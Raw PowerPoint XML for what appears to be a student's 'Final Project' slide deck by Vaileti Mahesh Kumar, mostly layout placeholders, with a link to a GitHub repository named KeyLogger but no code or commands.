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_rels/slide9.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide1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9.jpeg" ContentType="image/jpeg"/>
  <Override PartName="/ppt/media/image4.jpeg" ContentType="image/jpeg"/>
  <Override PartName="/ppt/media/image5.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image8.jpeg" ContentType="image/jpeg"/>
  <Override PartName="/ppt/media/image6.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image10.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1B023A4E-DF84-4549-A15A-9BFF67869037}"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CFCF135A-5DC1-488F-A38D-F6FCC419A014}" type="slidenum">
              <a:t>&lt;#&gt;</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="PlaceHolder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="5"/>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wo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7E9A7D3A-8947-4992-AE8F-A504E0D2DF7D}"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49643E5E-1E34-4106-ADAD-2C75158C9263}" type="slidenum">
              <a:t>&lt;#&gt;</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="PlaceHolder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="1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lank">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82"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8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5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{44A8E195-28EC-49E4-8A5A-88B621D00C88}" type="slidenum">
              <a:t>&lt;#&gt;</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="PlaceHolder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="14"/>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 name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3195720" y="2067480"/>
            <a:ext cx="5800320" cy="1145160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Click to edit the title text format</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRP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US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="3"/>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82FE6E98-DBAC-4464-865F-DC45A19CCEB7}" type="slidenum">
              <a:rPr b="0" lang="en-US" sz="1100" spc="9"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8"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9"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0"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1"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2"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3"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4"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5"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6"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7"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buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="4800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Click to edit the title text format</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="1577520"/>
            <a:ext cx="10972440" cy="4525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1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Fifth Outline Level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="18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1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Sixth Outline Level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="18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1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Seventh Outline Level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4145400" y="6378120"/>
            <a:ext cx="3900960" cy="34272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0" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="5"/>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US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="PlaceHolder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="6"/>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B828B319-9441-40A9-82C9-5C6D5062FC42}" type="slidenum">
              <a:rPr b="0" lang="en-US" sz="1100" spc="9" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="2d936b"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>&lt;number&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="11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5"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6"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7"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8"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9"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0"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1"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2"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3"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4"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buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="4800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Click to edit the title text format</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="1577520"/>
            <a:ext cx="5303160" cy="397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1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Fifth Outline Level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="18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1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Sixth Outline Level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="18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1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Seventh Outline Level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6278760" y="1577520"/>
            <a:ext cx="5303160" cy="397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1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Fifth Outline Level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="18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1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Sixth Outline Level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="18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1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Seventh Outline Level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4145400" y="6378120"/>
            <a:ext cx="3900960" cy="34272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8" name="PlaceHolder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="8"/>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US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="PlaceHolder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="9"/>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D0934CF3-5431-4FFA-ACC4-B708EC61BD32}" type="slidenum">
              <a:rPr b="0" lang="en-US" sz="1100" spc="9" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="2d936b"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>&lt;number&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="11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3"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4"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5"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6"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7"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8"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9"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0"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1"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2"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buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="4800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Click to edit the title text format</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4145400" y="6378120"/>
            <a:ext cx="3900960" cy="34272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4" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="11"/>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US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>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4B569D57-B6D5-45FA-BA3F-21B330A5EA27}" type="slidenum">
              <a:rPr b="0" lang="en-US" sz="1100" spc="9"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6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9"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0"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1"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2"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3"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4"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5"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6"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7"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8"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9" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4145400" y="6378120"/>
            <a:ext cx="3900960" cy="34272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0" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="14"/>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US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="15"/>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804E4522-CC41-466A-BDBA-E8B2E1B5A438}" type="slidenum">
              <a:rPr b="0" lang="en-US" sz="1100" spc="9" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="2d936b"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>&lt;number&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="11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hyperlink" Target="https://github.com/MaheshKumar1533/KeyLogger.git" TargetMode="External"/><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4" name="object 2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="743040" y="1104840"/>
            <a:ext cx="1742400" cy="1333080"/>
            <a:chOff x="743040" y="1104840"/>
            <a:chExt cx="1742400" cy="1333080"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="85" name="object 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="743040" y="1380960"/>
              <a:ext cx="1228320" cy="1056960"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="textAreaLeft" fmla="*/ 0 w 1228320"/>
                <a:gd name="textAreaRight" fmla="*/ 1228680 w 1228320"/>
                <a:gd name="textAreaTop" fmla="*/ 0 h 1056960"/>
                <a:gd name="textAreaBottom" fmla="*/ 1057320 h 105696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6" name="object 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1838160" y="1104840"/>
              <a:ext cx="647280" cy="561600"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="textAreaLeft" fmla="*/ 0 w 647280"/>
                <a:gd name="textAreaRight" fmla="*/ 647640 w 647280"/>
                <a:gd name="textAreaTop" fmla="*/ 0 h 561600"/>
                <a:gd name="textAreaBottom" fmla="*/ 561960 h 56160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sp>
        <p:nvSpPr>
          <p:cNvPr id="87" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3753000" y="1190520"/>
            <a:ext cx="1666440" cy="1437840"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="textAreaLeft" fmla="*/ 0 w 1666440"/>
              <a:gd name="textAreaRight" fmla="*/ 1666800 w 1666440"/>
              <a:gd name="textAreaTop" fmla="*/ 0 h 1437840"/>
              <a:gd name="textAreaBottom" fmla="*/ 1438200 h 143784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8" name="object 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3800520" y="5229360"/>
            <a:ext cx="723600" cy="618840"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="textAreaLeft" fmla="*/ 0 w 723600"/>
              <a:gd name="textAreaRight" fmla="*/ 723960 w 723600"/>
              <a:gd name="textAreaTop" fmla="*/ 0 h 618840"/>
              <a:gd name="textAreaBottom" fmla="*/ 619200 h 61884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9" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2103120" y="2121120"/>
            <a:ext cx="8762760" cy="1161720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="16560" bIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="3213720" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="130"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-IN" sz="3200" spc="12" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Vaileti Mahesh Kumar</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90" name="object 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6484680" y="2821680"/>
            <a:ext cx="1859040" cy="743760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="12600" bIns="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="12600" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="99"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2400" spc="9" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="2d936b"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Final</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2400" spc="-165" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="2d936b"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2400" spc="-7" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="2d936b"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Project</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="91" name="object 9" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="676440" y="6467400"/>
            <a:ext cx="2142720" cy="199800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92" name="object 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="739800" y="6473160"/>
            <a:ext cx="179856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solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="93" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="16"/>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6344A862-0ACB-41CF-9EE3-42322E8533FE}" type="slidenum">
              <a:rPr b="0" lang="en-US" sz="1100" spc="9" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="2d936b"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>&lt;number&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="11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3" name="object 2" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1476360"/>
            <a:ext cx="2695320" cy="3247560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="194"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95"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96"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97" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="558000" y="857880"/>
            <a:ext cx="9762840" cy="1158480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="13320" bIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="12600" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-41" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Y</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="9" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="24" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="4" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="24" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="9" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="24" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>LU</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9" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>N</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-347" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-35" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-7" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>N</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="32" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </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1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="58" strike="noStrike">
                <a:solidFill>
